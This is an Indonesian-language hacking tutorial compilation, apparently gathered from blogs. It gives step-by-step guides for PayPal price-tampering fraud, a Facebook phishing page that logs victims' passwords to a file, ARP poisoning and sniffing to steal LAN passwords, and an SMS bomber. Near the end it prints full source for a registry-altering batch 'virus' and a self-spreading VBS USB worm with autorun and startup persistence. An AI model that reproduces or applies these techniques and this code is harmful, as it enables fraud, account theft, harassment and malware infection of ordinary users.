2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat inginmemasukkan password, tingal copy-paste ajah. Keyloger akan membaca passwordanda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan. Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh. Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).

“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special. Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS. Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter. Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil. Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.net.

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya. Lalu bagaimana cara mendapatkan cookies sang korban?

1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.

2. Mencuri Cokies. Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bias dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP. Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.

2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. Reject ajah..

3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim. Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:

a. Menetapkan session identifier yang unik

b. Menetapkan sistem identifier berpola acak

c. Session identifier yang independent

d. Session identifier yang bisa dipetakan dengan koneksi client side.

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.

Memanfaatkan Kelalaian user dalam penggunaan fitur browser Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager. Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.net nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live. Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung. Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bias menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan. Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bias melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda. Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial. Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu. Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password. Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”. Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya.

Google.com.

Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitive dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

WEB BELAJAR HEACKER

jaman sudah mulai hebat .

sekarangpun anda tidak perlu lagi harus belajar hacker kemana" .

ada sebuah web yang mendukung anda untuk belajar hacker .

sebut saja http://www.hackertest.net
benar ? link inilah yang mengajarkan saya untuk belajar menghacker .

hehehehehehehe .
web tersebut menggunakan bahasa inggris klo anda ingin lebih mudah menggunakan bhs. indonesia > anda bisa msk di : http://translate.google.co.id


ato anda bisa masukan langsung lewat link ini :
http://translate.google.com/translate?prev=hp&hl=en&js=n&u=http%3A%2F%2Fwww.hackertest.net%2F&sl=en&tl=id



eiitzz ada satu lagi .
silahkan masuk disini :
http://www.try2hack.nl/



selamat mencoba .

Hacking PayPal Untuk Beli Barang di Internet Hanya Dengan $ 0,01

seperti yang dikatakan blog ini http://jakabanda.blogspot.com

Ini sebenarnya trik lama yang dulu pernah saya coba dan dapet buku 10 biji, cuma saya nggak bisa sebutin situsnya (sorry bro… ntar kalo ketahuan bisa mampus dipenjara…).
Kalo pengen coba ikutin langkah sederhana yang pernah saya coba:
Yang harus Anda punya:
Browser Mozilla Firefox
Account PayPal


Ini langkahnya:

1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …

Selamat Mencoba …

Cara Membobol / Membuka password file rar dan zip

Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!

tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.

Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.

RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.

Utility kecil yang bernama RarCrack dijalankan dengan command line.

silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.

Cara menggunakannya :

RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .

hacking facebook dengan login palsu [fakelogin]

facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.
belum baca cara buat login palsu di friendster? baca dahulu disini

oke langsung saja.

1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .


untuk penyebarannya silahkan dengan cara masing2...

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:


disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini




kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh...silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . .

Cara Mudah Hacking di LAN (Local Area Network)

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
   * Buka program Cain anda
   * Klik pada bagian configure
   * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
   * Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
   Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
   * Setelah itu apply settingannya dan klik ok
   * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
   * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
   * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
   * Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
   * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
   * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
   * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
   * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
   * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
   * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di

Cara Mudah Nge-BOMB SMS Orang Lain Lewat HP

BOMB SMS ,,
apa yaaa itu ? bomb SMS sama halnya dengan bomb email yang pernah dimuat disini cara mudah ngeBomb email orang lain.

jadi intinyaa, teman - teman bisa ngrim SMS yang buanyak sekali ke orang lain, tapi pulsa ditanggung penumpang yaaa hahahaha
ingat! perbuatan ini merugikan orang lain, jadi jangan disalah gunakan yaaa guys hahaha :p

disini PedasManisCinta menggunakan aplikasi SMS-Bomber berbasis java
jadi teman - teman semua bisa langsung gunakan aplikasi ini langsung dari handphone yang berbasis java juga hahaha

silahkan download aplikasinya disini :
http://www.ziddu.com/download/13869358/SMS-Bomber.jar.html

untuk cara menggunakannya mudah kog,
1. download file diatas lewat PC / klo lewat Hape bisa langsung aja dibuka aplikasinya. (yang download lewat PC pindahin ke Hape dulu yaaa) ingat untuk HP berbasis JAVA yaa.

2. Setelah aplikasi terbuka akan ada 2 opsi; Target Number dan Message Count
untuk Target Number -> pasti tau kan :p
Message count -> untuk pilihan berapa pesan SMS yang akan dikirimkan (isi 100 juga boleh tu hahaha)

3. setelah itu klik okeee, akan ada pilihan lagi Enter Mesagge
masukan pesan terakhir anda untuk teman yang anda jail ii hehehe

4. tinggal klik SEND dan lihat berapa pesan yang akan dikirim hahahahahah :D


ingat yaaaa!
- aplikasi untuk Hape berbasis JAVA
- pulsa pengiriman SMS ditanggung penumpang hehe (ane saranin pake provider yang kasih banyak bonus SMS)
- ingat DOSA hehe

sampai disini dulu yaaaaaaaaaaaaaaaaaa

Cara Buat Virus Sederhana Dari Notepad

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281

Tambahan ni :

kawan kawan buka notepad kalian salin scrib di bawah ini simpan dengan nama erwinda_putra.exe.vbs
AWAS…!!!!
virus ini sangat berbahaya…
apapun yang terjadi bukan tanggungan saya…
SALAM MESRA BUAT HACKER PADANG YE…
SALAMAT PENGHANCURKAN..
=====================================================
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”

loop